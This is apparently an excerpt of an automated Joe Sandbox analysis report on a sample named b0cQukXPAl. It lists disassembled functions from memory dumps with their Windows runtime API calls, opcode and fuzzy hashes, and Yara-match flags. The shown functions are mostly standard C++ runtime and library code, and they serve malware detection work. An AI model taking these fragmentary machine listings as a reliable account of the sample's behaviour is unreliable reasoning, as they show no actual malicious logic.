___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
_ValidateLocalCookies.LIBCMT ref: 00428781
__IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
_ValidateLocalCookies.LIBCMT ref: 00428801

Strings

csm, xrefs: 00428796

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99

Function 02114AA4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02114ABD

Part of subcall function 02114D8C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021147F0), ref: 02114D9C

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02114AD2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02114AE1
__CxxThrowException@8.LIBVCRUNTIME ref: 02114AEF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02114B65
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02114BA5
__CxxThrowException@8.LIBVCRUNTIME ref: 02114BB3

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction ID: ec073fe6857538d40e95d52bb95fa29b76cd81009eea451b0708e42fdcdbe0b8
Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction Fuzzy Hash: 0431E435A40214AFCF18EFA8C880B6DB3BAFF44B10F254579D915AB281DB70EA01DB94

Function 0043F931 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9

Function 0212FB98 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: 4e375f877124b9143ad43fa7603178c37b82339028524e2458dfdf997b542c5a
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: 9311B472585129BFDB252FB69C08E6B7E7EEF82B31B110624FC25D7150DB318925CAA0

Function 0043A373 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3

_free.LIBCMT ref: 0043A3C1

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 0043A3CC
_free.LIBCMT ref: 0043A3D7
_free.LIBCMT ref: 0043A42B
_free.LIBCMT ref: 0043A436
_free.LIBCMT ref: 0043A441
_free.LIBCMT ref: 0043A44C

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47

Function 0212A5DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0212A321: _free.LIBCMT ref: 0212A34A

_free.LIBCMT ref: 0212A628

Part of subcall function 021236C1: HeapFree.KERNEL32(00000000,00000000,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?), ref: 021236D7
Part of subcall function 021236C1: GetLastError.KERNEL32(?,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?,?), ref: 021236E9

_free.LIBCMT ref: 0212A633
_free.LIBCMT ref: 0212A63E
_free.LIBCMT ref: 0212A692
_free.LIBCMT ref: 0212A69D
_free.LIBCMT ref: 0212A6A8
_free.LIBCMT ref: 0212A6B3

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 5fb15ac375bd712d46a1f8e43f29a778259457c50876bca5648db9ce52fba24b
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 5111F471980B24BEDA20BBB1CE49FCB779EDF04700F804C25B299A6160D765B93D8F90

Function 004123E2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F0
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F6
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 00412423
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041242D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041243F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
__CxxThrowException@8.LIBVCRUNTIME ref: 00412463

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D

Function 02102649 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02100D90,?,?,?,00000000), ref: 02102657
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02100D90,?,?,?,00000000), ref: 0210265D
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02100D90,?,?,?,00000000), ref: 0210268A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02100D90,?,?,?,00000000), ref: 02102694
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02100D90,?,?,?,00000000), ref: 021026A6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021026BC
__CxxThrowException@8.LIBVCRUNTIME ref: 021026CA

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
Instruction ID: 345491e16c11707542758658f574aebbf51e630c09cb441c4d5e25436f491ed3
Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
Instruction Fuzzy Hash: FF01F239681105ABDB24BFA5DC8CFAF3B6CAF42B52B600435FC11D3090DBB4D9048AE8

Function 02102494 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021066FB), ref: 021024A6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021024B4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021024C2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021066FB), ref: 021024F0
GetProcAddress.KERNEL32(00000000), ref: 021024F7
GetLastError.KERNEL32(?,?,?,021066FB), ref: 02102512
GetLastError.KERNEL32(?,?,?,021066FB), ref: 0210251E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02102534
__CxxThrowException@8.LIBVCRUNTIME ref: 02102542

Strings

kernel32.dll, xrefs: 021024A0, 021024A5, 021024EA

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: 29e84a6498edd8dacee3ff1e1f64205779c11e5163fb6a8c88037907c737055a
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: 1CF081769403107FB6113B79BD9D95A7FACDD46A633200626FC11D22D2EFB5C5008A6C

Function 0040C60E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D

Strings

ios_base::badbit set, xrefs: 0040C630, 0040C650
<(@, xrefs: 0040C611
<(@, xrefs: 0040C647
ios_base::eofbit set, xrefs: 0040C63F
ios_base::failbit set, xrefs: 0040C63A

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Exception@8Throw
String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-859722693
Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C

Function 00430EB2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

_memcmp.LIBVCRUNTIME ref: 0043115C
_free.LIBCMT ref: 004311CD
_free.LIBCMT ref: 004311E6
_free.LIBCMT ref: 00431218
_free.LIBCMT ref: 00431221
_free.LIBCMT ref: 0043122D

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44

Function 0212238B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021225DC,00000001,00000001,?), ref: 021223E5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021225DC,00000001,00000001,?,?,?,?), ref: 0212246B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02122565
__freea.LIBCMT ref: 02122572

Part of subcall function 021238FE: RtlAllocateHeap.NTDLL(00000000,020FDACD,00000000), ref: 02123930

__freea.LIBCMT ref: 0212257B
__freea.LIBCMT ref: 021225A0

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
Instruction ID: 8da84f3fe321e9082b363c70eee3a33790bc43ddb53ca8c802db965553a1ea9c
Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
Instruction Fuzzy Hash: F251F272A80226AFDB298F64CCA4EFF77AAEB44754F158628FD04D6150DB34DC68CA50

Function 0211E409 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0211E435
__cftoe.LIBCMT ref: 0211E467

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: 0acd62e85d122af45282ef0c340e61e06743104b87b62c5e5d55dcda2a6ef815
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 9E512636980205AFDF249FE88C45FAE7BAAAF4C334F504239FC19D6191EB31D511CAA4

Function 0211301B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02113041

Part of subcall function 02108AA2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02108AAD

SafeSQueue.LIBCONCRT ref: 0211305A
Concurrency::location::_Assign.LIBCMT ref: 0211311A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0211313B
__CxxThrowException@8.LIBVCRUNTIME ref: 02113149

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
Instruction ID: 21dd2d9aa5732b1a6d08e0e89cf92ff177784296e389e46106c99c62b0ec8123
Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
Instruction Fuzzy Hash: 9F31E031A406119FCB29EF69C884BAEB7F5BF44710F1145A9DD2A8B285DB70E805CBC0

Function 02118F14 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 02118F67
FindMITargetTypeInstance.LIBVCRUNTIME ref: 02118F80
FindVITargetTypeInstance.LIBVCRUNTIME ref: 02118F87
PMDtoOffset.LIBCMT ref: 02118FA6

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
Instruction ID: b8ca19f1b28eb67e02ecb7ac292be06d7d74fa55962ef928bf3ba91c85e82c9c
Opcode Fuzzy Hash: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
Instruction Fuzzy Hash: 28213872684305AFEF14DF68DC45FAE77A6EF45750B16C13AE91593180D731E900CA90

Function 020F542D Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 020F5441
__Mtx_init.LIBCPMT ref: 020F5467
std::_Cnd_initX.LIBCPMT ref: 020F548A
__Thrd_start.LIBCPMT ref: 020F54AF
std::_Cnd_waitX.LIBCPMT ref: 020F54CF
std::_Cnd_initX.LIBCPMT ref: 020F54FC

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction ID: efe8cf1392ddeda7ca621264425c76b43ce2b1a87ab54a89c2a5922088433e7e
Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction Fuzzy Hash: 2F21A372C843099BDF91EBB4DC44BDDBBF9AF09325F54401AE204B3980DB749944AF65

Function 00428DCA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,092F78B9), ref: 00428DD8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,092F78B9), ref: 00428E51

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D

Function 02119031 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02119028,021169B9,021308F7,00000008,02130C5C,?,?,?,?,02113CA2,?,?,0045A064), ref: 0211903F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0211904D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02119066
SetLastError.KERNEL32(00000000,?,02119028,021169B9,021308F7,00000008,02130C5C,?,?,?,?,02113CA2,?,?,0045A064), ref: 021190B8

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction ID: 0cb48c1ed7dae00419c7e05e984db8983b9879d95a3a24db38a639197c609cf4
Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction Fuzzy Hash: 42014732189B116EA7282BF46CA8A2B2B49EB05775B300339F431401F0EF3288158989

Function 00404D48 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
int.LIBCPMT ref: 00404D70

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 00404D79
std::_Facet_Register.LIBCPMT ref: 00404DAA
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD

Function 020F4FAF Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 020F4FC0
int.LIBCPMT ref: 020F4FD7

Part of subcall function 020FBFB9: std::_Lockit::_Lockit.LIBCPMT ref: 020FBFCA
Part of subcall function 020FBFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 020FBFE4

std::locale::_Getfacet.LIBCPMT ref: 020F4FE0
std::_Facet_Register.LIBCPMT ref: 020F5011
std::_Lockit::~_Lockit.LIBCPMT ref: 020F5027
__CxxThrowException@8.LIBVCRUNTIME ref: 020F5045

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction ID: 13022c1468066486ab1c4f7d170dc8b2af25c88439c97a2f05f4c690ab32c494
Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction Fuzzy Hash: 2B1129318803199FCBA1EBA4DC44BED77B1BF44315F540529E605BBAE0DB349908EF90

Function 0040C17F Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
int.LIBCPMT ref: 0040C1A7

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
std::_Facet_Register.LIBCPMT ref: 0040C1E1
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C215

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99

Function 00405564 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00405575
int.LIBCPMT ref: 0040558C

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 00405595
std::_Facet_Register.LIBCPMT ref: 004055C6
std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
__CxxThrowException@8.LIBVCRUNTIME ref: 004055FA

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

